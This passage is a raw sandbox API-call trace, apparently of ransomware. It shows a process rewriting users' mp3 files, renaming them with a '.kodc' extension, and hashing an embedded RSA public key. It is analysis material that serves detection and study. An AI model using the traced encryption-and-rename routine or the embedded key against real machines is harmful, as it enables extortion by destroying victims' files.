Flags=0x0, Size=0x100) returned 0x69b948 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b900d8 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.081] GetCurrentThreadId () returned 0x42c [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad48 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad60 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad30 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad78 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad48 | out: hHeap=0x630000) returned 1 [0099.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad48 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad48 | out: hHeap=0x630000) returned 1 [0099.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad78 | out: hHeap=0x630000) returned 1 [0099.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad60 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad30 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad18 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9db10 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.084] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x9aa4, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x9aa4, lpOverlapped=0x0) returned 1 [0099.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0099.084] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9aa9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.084] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0099.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0099.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.085] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.085] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.085] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.085] CloseHandle (hObject=0x5cc) returned 1 [0099.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.086] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lQleP8ZqnzS.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lqlep8zqnzs.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lQleP8ZqnzS.mp3.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lqlep8zqnzs.mp3.kodc")) returned 1 [0099.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.087] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.088] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc11c8600, ftCreationTime.dwHighDateTime=0x1d5b618, ftLastAccessTime.dwLowDateTime=0xbd26b870, ftLastAccessTime.dwHighDateTime=0x1d5ba02, ftLastWriteTime.dwLowDateTime=0xbd26b870, ftLastWriteTime.dwHighDateTime=0x1d5ba02, nFileSizeHigh=0x0, nFileSizeLow=0x14dc9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NRpZg_.mp3", cAlternateFileName="")) returned 1 [0099.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.088] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\NRpZg_.mp3") returned=".mp3" [0099.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\NRpZg_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\nrpzg_.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.088] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=85449) returned 1 [0099.088] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.091] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14da3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.091] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.092] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.092] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x14dc9, lpOverlapped=0x0) returned 1 [0099.093] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.093] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.093] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.093] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.094] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.094] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.094] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.094] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.094] GetLastError () returned 0x0 [0099.094] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.094] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.094] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.094] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.094] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14dd0) returned 0x9ba4d90 [0099.095] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9db10 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad18 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9db58 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad30 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad60 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad78 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.095] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0099.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad60 | out: hHeap=0x630000) returned 1 [0099.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad78 | out: hHeap=0x630000) returned 1 [0099.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad78 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ad60 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.095] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.095] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad78 | out: hHeap=0x630000) returned 1 [0099.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 